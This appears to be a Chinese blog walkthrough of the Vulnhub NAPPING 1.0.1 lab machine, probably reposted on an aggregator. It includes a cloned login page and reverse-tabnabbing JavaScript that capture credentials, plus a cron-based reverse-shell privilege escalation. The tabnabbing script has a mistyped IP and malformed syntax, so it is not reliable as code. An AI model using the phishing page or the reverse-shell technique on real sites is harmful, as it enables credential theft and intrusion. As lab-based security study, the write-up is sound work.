当前位置: 首页 > news >正文

Vulnhub-NAPPING: 1.0.1靶机

1.安装靶机

在官网中下载好对应的靶机

https://download.vulnhub.com/napping/napping-1.0.1.ova

安装到VirtualBox中,这里使用的网络模式为桥接

2.启动靶机

3.IP以及端口扫描

使用nmap对同一网段下的主机进行扫描

nmap 172.16.2.61/24

可以看到开放了80 22 端口

4.访问IP以及端口 

我们先访问一下他的80端口,可以看到一个登录界面

发现页面有注册的功能,那么我们可以先注册一个账号

然后进行登录

发现这里有个输入框,可以让我们输入任意网址,我们先输入一个百度试一下

他会给我们一个连接地址点击一下就会跳转到百度,那么我可以利用这个Tabnabbing漏洞来进行我们的攻击了

5.漏洞利用

我们先编写一个正常的页面

这里直接复制那个网站的登录界面的源代码

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>Login</title><link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"><style>body{ font: 14px sans-serif; }.wrapper{ width: 360px; padding: 20px; }</style>
</head>
<body><div class="wrapper"><h2>Login</h2><p>Please fill in your credentials to login.</p><form action="/index.php" method="post"><div class="form-group"><label>Username</label><input type="text" name="username" class="form-control " value=""><span class="invalid-feedback"></span></div>    <div class="form-group"><label>Password</label><input type="password" name="password" class="form-control "><span class="invalid-feedback"></span></div><div class="form-group"><input type="submit" class="btn btn-primary" value="Login"></div><p>Don't have an account? <a href="register.php">Sign up now</a>.</p></form></div>
</body>
</html>

然后我们写一个恶意的网页

<!DOCTYPE html>
<html><body><script>if(window.opener) mainframe.location.replace=('http://172.16.2.61:8888/2.html');if(window.opener != window) mainframe.location.replace=('http://1172.16.2.61:8888/2.html');</script></body>
</html>

然后我们在kali中启动http服务并将恶意的网页连接上传到我们靶机的网页中,然后我们去访问一下

查看我们的端口监听就可以获得用户名和密码了

然后我们可以根据获得的账号密码来进行登录了,可以执行系统命令了

然后我们可以通过反弹shell来提升一下我们的权限,先查看一下当前用户可以允许的程序

find / -group administrators 2>/dev/null

看一下文件的内容其中site_status.txt文件每两分钟执行一次那么我们就可以利用这个来进行反弹shell

在/home/daniel下写入shell.sh文件

然后再python文件中写入对shell脚本的执行

然后去监听我们的8888端口,反弹到shell

http://www.lryc.cn/news/604047.html

相关文章:

  • 汉得班翎流程平台V1.20.0正式发布:AI智慧赋能,集成效率跃升!
  • ZKmall开源商城架构工具链:Docker、k8s 部署与管理技巧
  • 基于三台主机搭建 Web 服务环境:Nginx、NFS 与 DNS 配置全流程
  • 机械学习--线性回归---三个小案例
  • Kun_Tools(全能文档工具)V0.4.6 便携版
  • 2025年中科院与JCR期刊分区深度对比(第一期):TON中科院分区3区不变,JCR分区升至Q1;TOSEM重回中科院1区!
  • I2C 与 SMBus:同根同源,各有千秋
  • 学习Python中Selenium模块的基本用法(3:下载浏览器驱动续)
  • 美国股市高频tick级分时交易数据解码与订单簿及交易指令分析
  • 使用 Spring AI Alibaba MCP 结合 Nacos 实现企业级智能体应用
  • win10 环境删除文件提示文件被使用无法删除怎么办?
  • Aura_P41_PXX GameplayEffect
  • iOS仿写 —— 计算器
  • Python包架构设计与模式应用:构建可扩展的企业级组件
  • 车载诊断架构 --- 关于诊断时间参数P4的浅析
  • ABP VNext + GraphQL Federation:跨微服务联合 Schema 分层
  • 落霞归雁思维框架应用(十一) ——开发如何选语言与架构:把“技术洪流”修成顺势河道
  • 【Mac版】Linux 入门命令行快捷键+联想记忆
  • Doris中文检索效果调优
  • vulhub-Breakout靶机
  • 减速机:自动化生产线的“精密传动心脏”
  • 网络原理--HTTPHTTPS
  • SQL注入SQLi-LABS 靶场less26-30详细通关攻略
  • OpenCV 学习探秘之三:从图像读取到特征识别,再到机器学习等函数接口的全面实战应用与解析
  • 【硬件-笔试面试题】硬件/电子工程师,笔试面试题-44,(知识点:三极管,PN结,正偏反偏判断,晶体管)
  • 通讯中为什么要用 0Hermitian 对称 *只使用“正频率”子载波,负频率部分通过对称性自动生成,从而保证时域信号是实值
  • 记一次导出pdf表单引发的问题
  • 【RAG搭建Agent应用实战】基于检索增强生成(RAG)搭建特定场景Agent应用
  • 验证pyspark提交参数指定环境变量生效
  • HbuilderX开发小程序